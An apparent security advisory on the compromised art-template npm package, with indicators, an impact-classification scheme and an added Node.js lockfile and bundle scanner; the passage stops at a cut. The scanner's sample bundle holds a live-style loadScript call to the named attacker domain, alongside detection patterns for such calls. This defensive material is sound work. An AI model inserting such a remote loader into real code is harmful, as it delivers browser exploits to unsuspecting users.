art-template npm Coruna Browser Exploit Compromise | Halting Problems

Executive Summary

Socket reported that the long-standing npm package art-template was compromised after maintainer control changed, with the affected versions injecting browser-side script loads into lib/template-web.js. Socket names art-template@4.13.5 and art-template@4.13.6 as the compromised releases and describes 4.13.3 as an earlier encoded loader stage (Socket).

This incident differs from install-time developer malware. A build that pulls in an affected version can ship the modified browser bundle to end users, where the injected JavaScript loads attacker-controlled code and routes traffic through a Coruna-like Safari/iOS exploit-delivery framework. Use the asset inventory, bundle diff, and cache-scope material below to identify where the poisoned bundle was shipped (Socket).

Key Facts

threat_type: "npm package compromise and browser-side exploit delivery"
ecosystem: "npm"
registry: "npmjs.com"
affected_packages:
- "art-template"
malicious_versions:
- "4.13.5"
- "4.13.6"
known_good_versions: []
fixed_or_safe_versions:
- "unknown; use maintainer-confirmed clean release and rebuild assets"
execution_trigger: "browser loads bundled art-template lib/template-web.js containing injected loadScript calls"
primary_impact: "browser exploit delivery, end-user redirection, potential client compromise"
campaign_context: "Socket links the delivery chain to a Coruna-like mobile exploit framework."
confidence: "high"
canonical_source: "https://socket.dev/blog/coruna-respawned-compromised-art-template-npm-package"
last_verified: "2026-05-24"

Source Confidence & Evidence Mapping

confirmed: Socket identifies art-template@4.13.5 and art-template@4.13.6 as compromised npm versions (Socket).

confirmed: The injected browser-side code loads remote JavaScript from v3[.]jiathis[.]com and routes into cfww[.]shop infrastructure (Socket).

confirmed: Socket reports Safari/iOS targeting and anti-bot checks in the downstream delivery chain (Socket).

unclear: The final exploitation module behavior was still under analysis in public reporting, so impact should be treated as potential browser compromise rather than a fully documented post-exploitation chain.

Impact Determination

Each classification below lists its criteria, the evidence required to assign it, the required action, and the condition for closing it.

Confirmed compromise
  Criteria: A deployed or cached asset contains affected art-template code or listed Coruna infrastructure and was served to users.
  Required evidence: Lockfile, build artifact hash or content hit, CDN object metadata, proxy/browser telemetry, and deployment timestamp.
  Required action: Remove affected versions, rebuild assets, invalidate caches, and preserve web telemetry for impacted sessions.
  Closure condition: Clean bundles are deployed, old CDN objects are purged, and no listed infrastructure appears in current traffic.

Presumed exposed
  Criteria: A frontend build used art-template@4.13.5 or 4.13.6, but deployed asset and cache state are not yet proven.
  Required evidence: Build logs, lockfile, package manager cache, deployment manifest, and asset inventory.
  Required action: Rebuild from a clean cache and invalidate CDN or browser-cacheable assets before waiting for final telemetry.
  Closure condition: Deployment records prove affected assets were replaced and cache invalidation completed.

Potentially exposed
  Criteria: The package appears in dependency trees, but the project may be server-only or the affected browser file was not bundled.
  Required evidence: SBOM, bundler output, import graph, and production asset search.
  Required action: Search built assets and web telemetry before declaring no end-user exposure.
  Closure condition: Asset searches and telemetry prove no affected browser bundle was shipped.

Not exposed
  Criteria: No affected package version exists in lockfiles, package caches, deployed bundles, or web telemetry.
  Required evidence: Lockfile search, artifact search, CDN object search, and proxy/browser telemetry query.
  Required action: Document the negative searches and keep frontend dependency scanning enabled.
  Closure condition: Search outputs cover both source and deployed assets.

Unknown
  Criteria: Build artifacts, CDN state, or web telemetry cannot be queried.
  Required evidence: Gap statement naming the unavailable package, build, CDN, or browser data.
  Required action: Treat production exposure as unresolved and prioritize cache invalidation if affected versions may have shipped.
  Closure condition: The missing artifact or telemetry source is recovered or the risk is accepted.

Minimum Evidence To Collect

minimum_evidence:
- "Lockfiles, package manager caches, and SBOMs covering frontend builds."
- "Built asset search results for injected domains, paths, and affected hashes."
- "Deployment manifest, CDN object metadata, and cache invalidation records."
- "Proxy, WAF, CDN, or browser telemetry for the listed infrastructure."
- "Production site list showing whether affected bundles were publicly served."

Timeline

2026-05-20 Socket publishes public research on the compromised art-template npm package and Coruna-like exploit delivery chain (Socket).

2026-05-24 This local feed split creates a standalone art-template article instead of keeping it inside a weekly roundup.
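Added example, not code from the Socket report or from this article: a small Node.js triage helper that applies the lockfile search, built-asset search, and Impact Determination classes from the sections above. It assumes the inputs are a parsed package-lock.json object and the text of a built bundle; the sample lockfile and bundle snippet embedded in it are constructed.

```javascript
// Added example (not from the Socket report or this article): lockfile and bundle triage
// for the art-template incident. Assumed inputs: parsed package-lock.json, built bundle text.
const AFFECTED_VERSIONS = new Set(['4.13.5', '4.13.6']);
const LOADER_STAGE = new Set(['4.13.3']); // earlier encoded loader stage per Socket
// Indicators named in the report, kept defanged and refanged only for matching.
const IOC_DOMAINS = ['v3[.]jiathis[.]com', 'cfww[.]shop'].map(d => d.replace(/\[\.\]/g, '.'));

// List every art-template entry in a lockfile: v2/v3 "packages" map or v1 "dependencies" tree.
function findArtTemplate(lock) {
  const hits = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path.endsWith('node_modules/art-template')) hits.push({ path, version: entry.version });
  }
  const walk = (deps, prefix) => {
    for (const [name, dep] of Object.entries(deps || {})) {
      const path = `${prefix}node_modules/${name}`;
      if (name === 'art-template') hits.push({ path, version: dep.version });
      walk(dep.dependencies, path + '/');
    }
  };
  if (!lock.packages) walk(lock.dependencies, '');
  return hits.map(h => ({ ...h, affected: AFFECTED_VERSIONS.has(h.version), loaderStage: LOADER_STAGE.has(h.version) }));
}

// Search built asset text for the listed domains and for loadScript calls pulling a remote URL.
function scanBundle(text) {
  const domains = IOC_DOMAINS.filter(d => text.includes(d));
  const re = /loadScript\s*\(\s*['"`](https?:\/\/[^'"`]+)['"`]/g;
  const remoteLoads = [...text.matchAll(re)].map(m => m[1]);
  return { domains, remoteLoads };
}

// Map collected evidence onto the article's classes; bundleHits === null means assets could not be queried.
function classify({ lockHits, bundleHits, inFrontendBuild, servedToUsers }) {
  const affected = lockHits.some(h => h.affected);
  const hit = bundleHits && (bundleHits.domains.length > 0 || bundleHits.remoteLoads.length > 0);
  if (hit && servedToUsers) return 'Confirmed compromise';
  if (affected && bundleHits === null) return 'Unknown';
  if (affected && inFrontendBuild) return 'Presumed exposed';
  if (affected) return 'Potentially exposed';
  return 'Not exposed';
}

// Constructed sample inputs (not real project data) so the example runs stand-alone.
const SAMPLE_LOCK = { lockfileVersion: 3, packages: { '': { name: 'demo-site' }, 'node_modules/art-template': { version: '4.13.6' } } };
const SAMPLE_BUNDLE = 'function loadScript(u){}\nloadScript("https://v3.jiathis.com/x.js");';
function demo() {
  const lockHits = findArtTemplate(SAMPLE_LOCK);
  const bundleHits = scanBundle(SAMPLE_BUNDLE);
  return classify({ lockHits, bundleHits, inFrontendBuild: true, servedToUsers: true });
}
```

Point findArtTemplate at each frontend project's lockfile and scanBundle at every built asset and cached CDN object, then record the resulting class alongside the evidence it was derived from.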

What Happened

art-template is a browser-capable JavaScript templating package. Socket...
